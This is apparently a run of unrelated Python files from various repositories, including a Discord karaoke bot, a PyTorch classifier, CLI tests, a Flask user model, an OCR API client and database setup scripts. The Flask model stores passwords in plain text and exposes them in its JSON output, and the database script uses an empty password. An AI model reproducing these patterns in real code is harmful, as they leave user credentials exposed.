discord.Embed(colour=0x0dbeff, description=description) # Can use discord.Colour() embed.title = "Commands" await bot.say(embed=embed) def getServerList(serverId): userList = None if serverId in userListPerServer: userList = userListPerServer[serverId] else: userList = [] userListPerServer[serverId] = userList return userList async def isAdmin(author): if author.server_permissions.administrator: return True elif "DJ" in [role.name for role in author.roles]: return True else: await bot.say("call an admin!") return False async def sayList(userList): actualDate = pendulum.now(tz) dayOfWeek = calendar.day_name[actualDate.weekday()] description = "It's {}!!!\n\n".format(dayOfWeek) singer = None for i in range(len(userList)): user = userList[i] userLine = user.nick if userLine == None: userLine = user.name userLine = str(userLine) if i == 0: userLine = "**{}** :musical_note:".format(userLine) singer = user description += "`{}.` {}\n".format(i+1, userLine) embed = discord.Embed(colour=0x0dbeff, description=description) # Can use discord.Colour() embed.title = "" #embed.set_author(name="Karaoke") if singer is not None: thumbnail = singer.avatar_url # thumbnail = thumbnail.replace(".webp?", ".jpeg?") # firefox doesn't support webp print(thumbnail) embed.set_thumbnail(url=thumbnail) embed.set_footer(text="\nCome! Join up!") await bot.say(embed=embed) def singNext(userList): userOnTop = userList.pop(0) userList.append(userOnTop) def singJump(userList, userIndex): if userIndex > 0 and userIndex < len(userList): userToJump = userList.pop(userIndex) userOnTop = userList.pop(0) userList.append(userOnTop) userList.insert(0, userToJump) bot.run(os.environ.get('TOKEN')) #!/usr/bin/python3 import numpy as np from lasp_rtaudio import RtAudio, SampleFormat, Format_SINT32, Format_FLOAT64 import time nframes = 0 samplerate = 48000 omg = 2*np.pi*1000 def mycallback(input_, nframes, streamtime): t = np.linspace(streamtime, streamtime + nframes/samplerate, nframes)[np.newaxis,:] outp = 0.1*np.sin(omg*t) return outp, 0 if __name__ == '__main__': pa = RtAudio() count = pa.getDeviceCount() # dev = pa.getDeviceInfo(0) for i in range(count): dev = pa.getDeviceInfo(i) print(dev) outputparams = {'deviceid': 0, 'nchannels': 1, 'firstchannel': 0} pa.openStream(outputparams, None , Format_FLOAT64,samplerate, 512, mycallback) pa.startStream() input() pa.stopStream() pa.closeStream() ''' Created on 27/10/2018 @author: jackee777 ''' from distutils.core import setup setup( name='babelnetpy', packages = ['babelnetpy'], version='0.1.0', description='it extendings BabelNet HTTP API for python 3', long_description="README.md", author='jackee777', install_requires=['urllib'], url='https://github.com/jackee777/pybabelnet' ) python/baseline/pytorch/classify/model.py import torch import torch.nn as nn import math import json from baseline.model import Classifier, load_classifier_model, create_classifier_model from baseline.pytorch.torchy import * from baseline.utils import listify import torch.backends.cudnn as cudnn cudnn.benchmark = True class WordClassifierBase(nn.Module, Classifier): def __init__(self): super(WordClassifierBase, self).__init__() @classmethod def load(cls, outname, **kwargs): model = torch.load(outname) return model def save(self, outname): print('saving %s' % outname) torch.save(self, outname) @classmethod def create(cls, embeddings_set, labels, **kwargs): word_embeddings = embeddings_set['word'] char_embeddings = embeddings_set.get('char') finetune = kwargs.get('finetune', True) activation_type = kwargs.get('activation', 'relu') model = cls() model.gpu = not bool(kwargs.get('nogpu', False)) model.word_dsz = word_embeddings.dsz model.char_dsz = char_embeddings.dsz if char_embeddings is not None else 0 model.pdrop = kwargs.get('dropout', 0.5) model.labels = labels model.lut = pytorch_embedding(word_embeddings, finetune) model.vocab = {} model.vocab['word'] = word_embeddings.vocab if model.char_dsz > 0: model.char_lut = pytorch_embedding(char_embeddings) model.vocab['char'] = char_embeddings.vocab char_filtsz = kwargs.get('cfiltsz', [3]) char_hsz = kwargs.get('char_hsz', 30) model._init_pool_chars(char_hsz, char_filtsz, activation_type) input_sz = model.word_dsz + model.char_comp.outsz else: input_sz = model.word_dsz model.log_softmax = nn.LogSoftmax(dim=1) nc = len(labels) pool_dim = model._init_pool(input_sz, **kwargs) stacked_dim = model._init_stacked(pool_dim, **kwargs) model._init_output(stacked_dim, nc) print(model) return model def create_loss(self): return nn.NLLLoss() def __init__(self): super(WordClassifierBase, self).__init__() def _init_pool_chars(self, char_hsz, char_filtsz, activation_type): self.char_comp = ParallelConv(self.char_dsz, char_hsz, char_filtsz, activation_type, self.pdrop) def make_input(self, batch_dict): x = batch_dict['x'] xch = batch_dict.get('xch') y = batch_dict.get('y') lengths = batch_dict.get('lengths') if self.gpu: x = x.cuda() if xch is not None: xch = xch.cuda() if y is not None: y = y.cuda() return x, xch, lengths, y def forward(self, input): # BxTxC x = input[0] embeddings = self.lut(x) if self.char_dsz > 0: xch = input[1] B, T, W = xch.shape embeddings_char = self._char_encoding(xch.view(-1, W)).view(B, T, self.char_comp.outsz) embeddings = torch.cat([embeddings, embeddings_char], 2) lengths = input[2] pooled = self._pool(embeddings, lengths) stacked = self._stacked(pooled) return self.output(stacked) def classify(self, batch_dict): x = batch_dict['x'] xch = batch_dict.get('xch') lengths = batch_dict.get('lengths') if type(x) == np.ndarray: x = torch.from_numpy(x) if xch is not None and type(xch) == np.ndarray: xch = torch.from_numpy(xch) if lengths is not None and type(lengths) == np.ndarray: lengths = torch.from_numpy(lengths) with torch.no_grad(): if self.gpu: x = x.cuda() if xch is not None: xch = xch.cuda() probs = self((x, xch, lengths)).exp() probs.div_(torch.sum(probs)) results = [] batchsz = probs.size(0) for b in range(batchsz): outcomes = [(self.labels[id_i], prob_i) for id_i, prob_i in enumerate(probs[b])] results.append(outcomes) return results def get_labels(self): return self.labels def get_vocab(self, name='word'): return self.vocab.get(name) def _pool(self, embeddings, lengths): pass def _stacked(self, pooled): if self.stacked is None: return pooled return self.stacked(pooled) def _init_stacked(self, input_dim, **kwargs): hszs = listify(kwargs.get('hsz', [])) if len(hszs) == 0: self.stacked = None return input_dim self.stacked = nn.Sequential() layers = [] in_layer_sz = input_dim for i, hsz in enumerate(hszs): layers.append(nn.Linear(in_layer_sz, hsz)) layers.append(nn.ReLU()) layers.append(nn.Dropout(self.pdrop)) in_layer_sz = hsz append2seq(self.stacked, layers) return in_layer_sz def _init_output(self, input_dim, nc): self.output = nn.Sequential() append2seq(self.output, ( nn.Linear(input_dim, nc), nn.LogSoftmax(dim=1) )) def _init_pool(self, dsz, **kwargs): pass def _char_encoding(self, xch): # For starters we need to perform embeddings for each character # (TxB) x W -> (TxB) x W x D char_embeds = self.char_lut(xch) # (TxB) x D x W char_vecs = char_embeds.transpose(1, 2).contiguous() mots = self.char_comp(char_vecs) return mots class ConvModel(WordClassifierBase): def __init__(self): super(ConvModel, self).__init__() def _init_pool(self, dsz, **kwargs): filtsz = kwargs['filtsz'] cmotsz = kwargs['cmotsz'] self.parallel_conv = ParallelConv(dsz, cmotsz, filtsz, "relu", self.pdrop) return self.parallel_conv.outsz def _pool(self, btc, lengths): embeddings = btc.transpose(1, 2).contiguous() return self.parallel_conv(embeddings) class LSTMModel(WordClassifierBase): def __init__(self): super(LSTMModel, self).__init__() def _init_pool(self, dsz, **kwargs): unif = kwargs.get('unif') hsz = kwargs.get('rnnsz', kwargs.get('hsz', 100)) if type(hsz) is list: hsz = hsz[0] self.lstm = nn.LSTM(dsz, hsz, 1, bias=True, dropout=self.pdrop) if unif is not None: for weight in self.lstm.parameters(): weight.data.uniform_(-unif, unif) return hsz def _pool(self, embeddings, lengths): embeddings = embeddings.transpose(0, 1) packed = torch.nn.utils.rnn.pack_padded_sequence(embeddings, lengths.tolist()) output, hidden = self.lstm(packed) hidden = hidden[0].view(hidden[0].shape[1:]) return hidden def make_input(self, batch_dict): x = batch_dict['x'] xch = batch_dict.get('xch') y = batch_dict.get('y') lengths = batch_dict['lengths'] lengths, perm_idx = lengths.sort(0, descending=True) x = x[perm_idx] if xch is not None: xch = xch[perm_idx] if y is not None: y = y[perm_idx] if self.gpu: x = x.cuda() if xch is not None: xch = xch.cuda() if y is not None: y = y.cuda() if y is not None: y = y.contiguous() return x, xch, lengths, y class NBowBase(WordClassifierBase): def _init__(self): super(NBowBase, self)._init__() def _init_pool(self, dsz, **kwargs): return dsz def _init_stacked(self, input_dim, **kwargs): kwargs['hsz'] = kwargs.get('hsz', [100]) return super(NBowBase, self)._init_stacked(input_dim, **kwargs) class NBowModel(NBowBase): def __init__(self): super(NBowModel, self).__init__() def _pool(self, embeddings): return torch.mean(embeddings, 1, False) class NBowMaxModel(NBowBase): def __init__(self): super(NBowMaxModel, self).__init__() def _pool(self, embeddings, lengths): dmax, _ = torch.max(embeddings, 1, False) return dmax # These define the possible models for this backend BASELINE_CLASSIFICATION_MODELS = { 'default': ConvModel.create, 'lstm': LSTMModel.create, 'nbow': NBowModel.create, 'nbowmax': NBowMaxModel.create } BASELINE_CLASSIFICATION_LOADERS = { 'default': ConvModel.load, 'lstm': LSTMModel.load, 'nbow': NBowModel.load, 'nbowmax': NBowMaxModel.create } def create_model(embeddings, labels, **kwargs): return create_classifier_model(BASELINE_CLASSIFICATION_MODELS, embeddings, labels, **kwargs) def load_model(outname, **kwargs): return load_classifier_model(BASELINE_CLASSIFICATION_LOADERS, outname, **kwargs) mk-fg/tahoe-lafs-public-cloudspubclouds/skydrive/__init__.py from allmydata.storage.backends.cloud.skydrive.skydrive_container import configure_skydrive_container configure_container = configure_skydrive_container """ A wrapper that converts the standardized environments to a format that the DeepQ and Deep SARSA(λ) implementations made by Gerben accept. """ import core class StandardizedEnvWrapper(object): def __init__(self, env: core.DiscreteEnvironment, state_transformer): """ Initializes the standardized env wrapper :param env: The environment :param state_transformer: A function that extracts a numerical state representation from the Observation object. """ self.env = env self.state_transformer = state_transformer self.terminated = True self.render = False self.action_space = self.env.valid_actions() def reset(self): self.terminated = False observation = self.env.reset() return self.state_transformer(observation) def step(self, action: core.Action): self.env.render = self.render observation, reward = self.env.step(action) self.terminated = observation.terminal return self.state_transformer(observation), reward def set_rendering(self, rendering): self.env.render = rendering self.render = rendering import functools import signal def timeoutable(seconds=5, message="execution timed out"): """ Times out a callable's execution if its runtime exceeds `seconds`. Examples: ```python import time from flashback import timeoutable @timeoutable(1) def fast(): time.sleep(0.1) return True fast() #=> True @timeoutable(1) def slow(): time.sleep(3) return True slow() #=> TimeoutError: Execution timed out ``` Params: seconds (int): the number of seconds to wait before timing out message (str): the custom message to display when timing out Return: Callable: a wrapper used to decorate a callable Raises: TimeoutError: if the callable's execution time is longer than `seconds` """ def wrapper(func): def _sigalrm_handler(_signum, _frame): raise TimeoutError(message) @functools.wraps(func) def inner(*args, **kwargs): signal.signal(signal.SIGALRM, _sigalrm_handler) signal.alarm(seconds) try: return func(*args, **kwargs) finally: signal.alarm(0) return inner return wrapper examples/compass_stats.py #!/usr/bin/env python """ Print a list of survey participants with their total feet surveyed. usage: compass_stats.py DATFILE... Example: $ ./examples/compass_stats.py caves/*.dat : 100262.7 : 50677.9 : 49401.7 : 47950.6 : 40586.3 : 35925.8 : 33693.5 : 32673.2 : 31508.3 : 27521.8 ... """ import sys import logging from davies import compass def compass_stats(datfiles): stats = {} for datfile in datfiles: for survey in compass.DatFile.read(datfile): for name in survey.team: stats[name] = stats.get(name, 0.0) + survey.length for name in sorted(stats, key=stats.get, reverse=True): print "%s:\t%0.1f" % (name, stats[name]) if __name__ == '__main__': logging.basicConfig(level=logging.DEBUG) if len(sys.argv) == 1: print >> sys.stderr, "usage: compass_stats.py DATFILE..." sys.exit(2) compass_stats(sys.argv[1:]) movie/__init__.py class Actor: def __init__(self, name, last_name, role): self.name = name self.last_name = last_name self.role = role def __str__(self): return f"name = {self.name}, last name = {self.last_name}, role in movie = {self.role}" class Movie: def __init__(self, title, date_released, actors): self.title = title self.date_released = date_released self.actors = actors def __str__(self): list_of_str_actors = [] for actor in self.actors: list_of_str_actors.append(str(actor)) return f"title of movie = {self.title}, release date = {self.date_released}, actors = {list_of_str_actors}" from enalp_cli import __version__ from enalp_cli.enalp_cli import main from click.testing import CliRunner def test_version(): assert __version__ == '0.1.0' def test_tokens_word(): runner = CliRunner() result = runner.invoke(main,['tokens','Hello world']) assert "['Hello', 'world']" in result.output assert result.exit_code == 0 def test_tokens_sentence(): runner = CliRunner() result = runner.invoke(main,['tokens','--tokentype','sentence',"Hello word. I'm John"]) assert '[Sentence("Hello word.")' in result.output assert result.exit_code == 0 def test_sentiment(): runner = CliRunner() result = runner.invoke(main,['sentiment',"This movie is wonderful"]) assert 'Sentiment(polarity=1.0, subjectivity=1.0)' in result.output assert result.exit_code == 0 def test_pos(): runner = CliRunner() result = runner.invoke(main,['pos',"Hello, my name is Ros"]) assert "[('Hello', 'NNP'), ('my', 'PRP$')" in result.output assert result.exit_code == 0 def test_readfile(): runner = CliRunner() result = runner.invoke(main,['readfile','./enalp_cli/sample.txt']) assert "Word Tokens: ['the', 'movie', 'was', 'great']" in result.output assert result.exit_code == 0 def test_posdictionary(): runner = CliRunner() result = runner.invoke(main,['posdictionary']) assert "CD cardinal digit" in result.output assert result.exit_code == 0 def test_about(): runner = CliRunner() result = runner.invoke(main,['about']) assert "ENALP CLI: Easy NAtural Language Processing CLI" in result.output assert result.exit_code == 0 def test_leet(): runner = CliRunner() result = runner.invoke(main,['leet','Hello Word!']) assert "Leet Version: #3110" in result.output assert result.exit_code == 0 def test_reverse(): runner = CliRunner() result = runner.invoke(main,['reverse',"Hello Word!"]) assert "Reverse Version:" in result.output assert result.exit_code == 0 def test_mixup(): runner = CliRunner() result = runner.invoke(main,['mixup','Hello Word!']) assert "MixUp Version:" in result.output assert result.exit_code == 0 def test_plural(): runner = CliRunner() result = runner.invoke(main,['plural','watch child']) assert "['watches', 'children']" in result.output assert result.exit_code == 0 def test_correction(): runner = CliRunner() result = runner.invoke(main,['correction','I havv a gooda spelling']) assert "I have a good spelling" in result.output assert result.exit_code == 0 def test_definition(): runner = CliRunner() result = runner.invoke(main,['definition','home']) assert "['where you live at a particular time'" in result.output assert result.exit_code == 0 def test_spell_check(): runner = CliRunner() result = runner.invoke(main,['spell-check','humman']) assert "('human', 1.0)" in result.output assert result.exit_code == 0 def test_word_count(): runner = CliRunner() result = runner.invoke(main,['word-count','--word_to_search','PYthoN','PYTHON Python python']) assert "cointains 3 time(s) the word" in result.output assert result.exit_code == 0 def test_translation(): runner = CliRunner() result = runner.invoke(main,['translation','Buongiorno, oggi è una bella giornata']) assert "Good morning, today is a beautiful" in result.output assert result.exit_code == 0 def test_ldetect(): runner = CliRunner() result = runner.invoke(main,['ldetect','Buongiorno, oggi è una bella giornata']) assert "The language in the Text is it" in result.output assert result.exit_code == 0 def test_lemmatize(): runner = CliRunner() result = runner.invoke(main,['lemmatize','We watched octopi and played cards']) assert "'We', 'watch', 'octopus', 'and', 'play', 'card'" in result.output assert result.exit_code == 0 import collections import copy import functools import logging from typing import ( Callable, Hashable, Optional, ) from litecore.mappings.types import MutableMappingFactory log = logging.getLogger(__name__) # TODO: checking pickling/json/copy/deepcopy for all class LastUpdatedOrderedDict(collections.OrderedDict): """Store items in the order in which keys were added/updated. From the recipe in the Python documentation: https://docs.python.org/3/library/collections.html#collections.OrderedDict """ def __setitem__(self, key, value): super().__setitem__(key, value) super().move_to_end(key) class OrderedDefaultDict(collections.OrderedDict): def __init__( self, default_factory: Optional[Callable] = None, *args, **kwargs, ): if default_factory is not None and not callable(default_factory): msg = f'First argument (default_factory) must be callable or None' raise TypeError(msg) super().__init__(*args, **kwargs) self.default_factory = default_factory def __repr__(self): items = list(self.items()) return f'{type(self).__name__}({self.default_factory!r}, {items!r})' def __missing__(self, key: Hashable): if self.default_factory is None: raise KeyError(key) self[key] = value = self.default_factory() return value def copy(self): return self.__copy__() def __copy__(self): return type(self)(self.default_factory, self) def __deepcopy__(self, memo): items = tuple(self.items()) return type(self)(self.default_factory, copy.deepcopy(items)) def __reduce__(self): args = (self.default_factory,) if self.default_factory else tuple() return type(self), args, None, None, iter(self.items()) class OrderedCounter(collections.Counter, collections.OrderedDict): """ Examples: >>> od = OrderedCounter('abracadabra') >>> od OrderedCounter(OrderedDict([('a', 5), ('b', 2), ('r', 2), ('c', 1), ('d', 1)])) >>> od.least_common() [('d', 1), ('c', 1), ('r', 2), ('b', 2), ('a', 5)] """ def __repr__(self) -> str: return f'{type(self).__name__}({collections.OrderedDict(self)!r})' def __reduce__(self): return type(self), (collections.OrderedDict(self),) class _RecursiveDefaultDict: def __init__(self, factory): self._factory = factory def __call__(self): return self._factory(self) def recursive_defaultdict( defaultdict_factory: MutableMappingFactory = collections.defaultdict, ): return defaultdict_factory(_RecursiveDefaultDict(defaultdict_factory)) def nested_defaultdict( default_factory, *, defaultdict_factory: MutableMappingFactory = collections.defaultdict, depth: int = 1, ): depth = litecore.validate.as_int(depth) if depth < 1: msg = f'Depth must be >= 1; got {depth!r}' raise ValueError(msg) factory = functools.partial(defaultdict_factory, default_factory) for _ in range(depth - 1): factory = functools.partial(defaultdict_factory, factory) return factory() DorenCalliku/distributionsrc/CountryGraph.py import networkx as nx import pandas as pd import random, json import numpy as np, numpy.random from unidecode import unidecode class CountryGraph: """ Creates a distribution of the cities spatially based on data. To represent each city properly we need to pass them as nodes, and put several factors that suggest the movement of the people in them. """ def __init__(self, country="Turkey"): """ country: the country's name, that will be read from a configuration file. subs: the cities and their sub-cities which will be used for mapping back. G: the graph containing the cities. """ self.country = country self.subs = {} self.G = nx.Graph() # setup self.__read_cities() # transportation self.__update_roads() #self.__update_ports() def __read_cities(self): """Update all the cities, and the sub-cities connected to them.""" self.cities = pd.read_csv("geo_data/cities_" + self.country.lower() +".csv") cities_subs = pd.read_csv("geo_data/cities_" + self.country.lower() + "_subs.csv") for e in range(len(cities_subs)): self.subs[ cities_subs.iloc[e]['city']] = cities_subs.iloc[e]['admin'] for city in list(self.cities['city']): city_properties = self.cities[self.cities['city'] == city].iloc[0] self.G.add_node(City( name=city_properties['city'], position=(city_properties['lat'], city_properties[ 'lng']), area=int(city_properties['Area(km²)'].replace(',','')), air=0, port=0)) def __update_roads(self): """Create the connections in the graph which represent roads.""" with open("geo_data/roads_turkey") as f: self.roads = list(json.loads( json.load( f)).values()) road_cities = [] for road in self.roads: road = self.remove_duplicates([self.subs[i] for i in road]) road_cities += road # add the cities which are connected to this road for i in range(len(road)-1): self.G.add_edge( road[i], road[i+1], weight=10) road_cities = set(road_cities) not_found = set( self.cities['city']) - set(road_cities) # order cities present in list by distance to this city for each in not_found: city = self.cities[ self.cities['city'] == each].iloc[0] found = self.cities[ self.cities['city'].isin( road_cities)] found['distance'] = ((found['lat']-city['lat'])**2 + (found['lng']-city['lng'])**2) closest_city = found.sort_values('distance').iloc[1]['city'] self.G.add_edge( city['city'], closest_city, weight=10) def display_graph(self): pos = {city:(long, lat) for (city, (lat,long)) in nx.get_node_attributes(self.G, 'position').items()} nx.draw(self.G, pos, with_labels=False, node_size=10, node_color='r', edge_color='b') def __update_ports(self): with open("geo_data/ports_turkey.json") as f: ports = json.load(f) for each in ports['airport']: self.G.nodes[self.subs[each]]['air'] = 1 for each in ports['port']: self.G.nodes[self.subs[each]]['port'] = 1 @staticmethod def remove_duplicates(seq): seen = set() seen_add = seen.add return [x for x in seq if not (x in seen or seen_add(x))]ozeiasgodoy/api_flask_ssys from data import alchemy class UserModel(alchemy.Model): __tablename__ = 'user' id = alchemy.Column(alchemy.Integer, primary_key=True) name = alchemy.Column(alchemy.String(80)) password = alchemy.Column(alchemy.String(80)) def __init__(self, name, password): self.name = name self.password = password def json(self): return {'name': self.name, 'password': self.password} @classmethod def find_by_name(cls, name): return cls.query.filter_by(name=name).first() def save_to_db(self): alchemy.session.add(self) alchemy.session.commit() def delete_from_db(self): alchemy.session.delete(self) alchemy.session.commit() bok/AI-with-Pyke # -*- coding: utf-8 -*- ##################################################################### # This program is free software. It comes without any warranty, to # # the extent permitted by applicable law. You can redistribute it # # and/or modify it under the terms of the Do What The Fuck You Want # # To Public License, Version 2, as published by Sam Hocevar. See # # http://sam.zoy.org/wtfpl/COPYING for more details. # ##################################################################### from agent import UAgent from object import UObject from universe import Universe from test import Test class Test(Test): def __init__(self): """ Trivial test Alice is at location 0, can move, and wants herself to be in location 1. Expected result : Alice moves from 0 to 1.""" alice = UAgent( 'Alice', ['move'], [('know', 'Alice', ('location', 'Alice', 1))] ) uni = Universe(2) uni.add(alice, 0) self.agents = [alice] self.objects = [] self.universe = uni self.nb_iteration_max = 2 self.test_name = 'Test of the move action.' #!/usr/bin/python3 # number of output figures = 2 from helper.figure import Figure import helper.plot lineNames = ["B-spl. surrogate", "Linear surrogate", "Objective function"] markerStyles = [".", "^", "v"] lineStyles = ["-", "--", ":"] fig = Figure.create(figsize=(5, 2)) ax = fig.gca() functionNames = ["Bra02", "GoP", "Sch06", "Ack", "Alp02", "Sch22"] lines = [{ "label" : r"\rlap{{{}}}".format(lineNames[r]), "marker" : markerStyles[r], "ms" : (6 if r == 0 else 3), "ls" : lineStyles[r], "color" : "k", } for r in range(len(lineNames))] lines = [(lines[r//2] if r % 2 == 0 else None) for r in range(2 * len(lines))] helper.plot.addCustomLegend(ax, ( [{ "label" : functionNames[r], "ls" : "-", "color" : "C{}".format(r), } for r in range(len(functionNames))] + lines ), ncol=6, loc="upper center", outside=True) ax.set_axis_off() fig.save() fig = Figure.create(figsize=(5, 2)) ax = fig.gca() lines = [{ "label" : lineNames[r], "marker" : markerStyles[r], "ms" : (6 if r == 0 else 3), "ls" : lineStyles[r], "color" : "k", } for r in range(len(lineNames)) ] helper.plot.addCustomLegend(ax, lines, ncol=3, loc="upper center", outside=True) ax.set_axis_off() fig.save() import traceback import cv2 import numpy import base64 import requests from .utils import fix from ..utils.log import logger from ..utils.recognize import RecognizeError class Language: Arabic = 'ara' Bulgarian = 'bul' Chinese_Simplified = 'chs' Chinese_Traditional = 'cht' Croatian = 'hrv' Danish = 'dan' Dutch = 'dut' English = 'eng' Finnish = 'fin' French = 'fre' German = 'ger' Greek = 'gre' Hungarian = 'hun' Korean = 'kor' Italian = 'ita' Japanese = 'jpn' Norwegian = 'nor' Polish = 'pol' Portuguese = 'por' Russian = 'rus' Slovenian = 'slv' Spanish = 'spa' Swedish = 'swe' Turkish = 'tur' class API: def __init__( self, endpoint='https://api.ocr.space/parse/image', api_key='helloworld', language=Language.Chinese_Simplified, **kwargs, ): """ :param endpoint: API endpoint to contact :param api_key: API key string :param language: document language :param **kwargs: other settings to API """ self.timeout = (5, 10) self.endpoint = endpoint self.payload = { 'isOverlayRequired': True, 'apikey': api_key, 'language': language, **kwargs } def _parse(self, raw): logger.debug(raw) if type(raw) == str: raise RecognizeError(raw) if raw['IsErroredOnProcessing']: raise RecognizeError(raw['ErrorMessage'][0]) if raw['ParsedResults'][0].get('TextOverlay') is None: raise RecognizeError('No Result') # ret = [] # for x in raw['ParsedResults'][0]['TextOverlay']['Lines']: # left, right, up, down = 1e30, 0, 1e30, 0 # for w in x['Words']: # left = min(left, w['Left']) # right = max(right, w['Left'] + w['Width']) # up = min(up, w['Top']) # down = max(down, w['Top'] + w['Height']) # ret.append([x['LineText'], [(left + right) / 2, (up + down) / 2]]) # return ret ret = [x['LineText'] for x in raw['ParsedResults'][0]['TextOverlay']['Lines']] return ret def ocr_file(self, fp): """ Process image from a local path. :param fp: A path or pointer to your file :return: Result in JSON format """ with (open(fp, 'rb') if type(fp) == str else fp) as f: r = requests.post( self.endpoint, files={'filename': f}, data=self.payload, timeout=self.timeout, ) return self._parse(r.json()) def ocr_url(self, url): """ Process an image at a given URL. :param url: Image url :return: Result in JSON format. """ data = self.payload data['url'] = url r = requests.post( self.endpoint, data=data, timeout=self.timeout, ) return self._parse(r.json()) def ocr_base64(self, base64image): """ Process an image given as base64. :param base64image: Image represented as Base64 :return: Result in JSON format. """ data = self.payload data['base64Image'] = base64image r = requests.post( self.endpoint, data=data, timeout=self.timeout, ) return self._parse(r.json()) def ocr_image(self, image: numpy.ndarray): data = self.payload data['base64Image'] = 'data:image/jpg;base64,' + \ base64.b64encode(cv2.imencode('.jpg', image)[1].tobytes()).decode() retry_times = 1 while True: try: r = requests.post( self.endpoint, data=data, timeout=self.timeout, ) break except Exception as e: logger.warning(e) logger.debug(traceback.format_exc()) retry_times -= 1 if retry_times > 0: logger.warning('重试中……') else: logger.warning('无网络或网络故障,无法连接到 OCR Space') return [] try: return self._parse(r.json()) except Exception as e: logger.debug(e) return [] def predict(self, image, scope): ret = self.ocr_image(image[scope[0][1]:scope[2][1], scope[0][0]:scope[2][0]]) if len(ret) == 0: return None return fix(ret[0]) # Copyright 2021 National Technology & Engineering Solutions # of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, # the U.S. Government retains certain rights in this software. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import numpy import cicada.additive import cicada.communicator import cicada.interactive logging.basicConfig(level=logging.INFO) with cicada.communicator.NNGCommunicator(timeout=300) as communicator: log = cicada.Logger(logging.getLogger(), communicator) protocol = cicada.additive.AdditiveProtocol(communicator) total = protocol.share(src=0, secret=protocol.encoder.encode(numpy.array(0)), shape=()) for i in range(communicator.world_size): share = cicada.interactive.secret_input(protocol=protocol, encoder=protocol.encoder, src=i) total = protocol.add(total, share) total = protocol.encoder.decode(protocol.reveal(total)) log.info(f"Player {communicator.rank} total: {total}") #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed May 12 09:16:20 2021 @author: trondkjekstad """ from psycopg2 import ( connect ) cleanup = ( 'DROP TABLE IF EXISTS blog_user CASCADE', 'DROP TABLE IF EXISTS post' ) commands = ( """ CREATE TABLE blog_user ( user_id SERIAL PRIMARY KEY, user_name VARCHAR(255) UNIQUE NOT NULL, user_password VARCHAR(255) NOT NULL ) """, """ CREATE TABLE post ( post_id SERIAL PRIMARY KEY, author_id INTEGER NOT NULL, created TIMESTAMP DEFAULT NOW(), title VARCHAR(350) NOT NULL, body VARCHAR(500) NOT NULL, FOREIGN KEY (author_id) REFERENCES blog_user (user_id) ) """) sqlCommands = ( 'INSERT INTO blog_user (user_name, user_password) VALUES (%s, %s) RETURNING user_id', 'INSERT INTO post (title, body, author_id) VALUES (%s, %s, %s)' ) conn = connect("dbname=Paal_SE4GI user=postgres password=") cur = conn.cursor() #for command in cleanup : # cur.execute(command) #for command in commands : # cur.execute(command) # print('execute command') #cur.execute(sqlCommands[0], ('Giuseppe', '3ety3e7')) #userId = cur.fetchone()[0] #cur.execute(sqlCommands[1], ('My First Post', 'This is the post body', userId)) #cur.execute('SELECT * FROM post') #print(cur.fetchall()) #cur.close() #conn.commit() #conn.close() #coding:utf-8 # # id: bugs.core_2952 # title: Case-sensitive character class names in SIMILAR TO # decription: # tracker_id: CORE-2952 # min_versions: ['3.0'] # versions: 3.0, 4.0 # qmid: None import pytest from firebird.qa import db_factory, isql_act, Action # version: 3.0 # resources: None substitutions_1 = [] init_script_1 = """""" db_1 = db_factory(charset='UTF8', sql_dialect=3, init=init_script_1) test_script_1 = """ -- NOTE: -- 1. This test can NOT be applied on 2.5 because of error: -- Statement failed, SQLSTATE = 42000 -- Invalid SIMILAR TO pattern -- 2. Seems that polish letter 'Ł' is NOT considered as having accent set term ^; execute block as begin begin execute statement 'drop collation co_utf8_ci_ai'; when any do begin end end begin execute statement 'drop collation co_utf8_cs_as'; when any do begin end end begin execute statement 'drop collation co_utf8_ci_as'; when any do begin end end end ^ set term ;^ commit; create collation co_utf8_ci_ai for utf8 from unicode case insensitive accent insensitive; create collation co_utf8_cs_as for utf8 from unicode case sensitive accent sensitive; create collation co_utf8_ci_as for utf8 from unicode case insensitive accent sensitive; commit; set list on; with recursive d as ( select cast('aeiouyAEIOUYáéíóúýàèìòùâêîôûãñõäëïöüÿçšąęźżăşţÁÉÍÓÚÝÀÈÌÒÙÂÊÎÔÛÃÑÕÄËÏÖÜŸÇŠĄĘŹŻĂŞŢ'||ascii_char(9)||ascii_char(10)||ascii_char(32) as varchar(100) character set utf8) s from rdb$database ) ,r as(select 1 i from rdb$database union all select r.i+1 from r where r.i < 100) ,e as( select substring(d.s from r.i for 1) c from d join r on r.i <= char_length(d.s) ) select decode( e.c, ascii_char(9),' ', ascii_char(10),' ', ascii_char(32), '\\w', e.c ) c -- ALPHA Latin letters a..z and A..Z. With an accent-insensitive collation, -- this class also matches accented forms of these characters. ,iif( e.c collate co_utf8_ci_ai similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_ci_as -- [:LOWER:] Lowercase Latin letters a..z. Also matches uppercase with case-insensitive -- collation and accented forms with accent-insensitive collation. ,iif( e.c collate co_utf8_ci_ai similar to '[[:LoWer:]]', 1, 0 ) s_lower_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:lOwEr:]]', 1, 0 ) s_lower_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:lowER:]]', 1, 0 ) s_lower_ci_as -- [:UPPER:] Uppercase Latin letters A..Z. Also matches lowercase with case-insensitive -- collation and accented forms with accent-insensitive collation. ,iif( e.c collate co_utf8_ci_ai similar to '[[:uPPer:]]', 1, 0 ) s_upper_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:uPpeR:]]', 1, 0 ) s_upper_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:UpPeR:]]', 1, 0 ) s_upper_ci_as -- [:WHITESPACE:] Matches vertical tab (ASCII 9), linefeed (ASCII 10), horizontal -- tab (ASCII 11), formfeed (ASCII 12), carriage return (ASCII 13) and space (ASCII 32). ,iif( e.c similar to '[[:WhiTespacE:]]', 1, 0 ) s_white_space from e 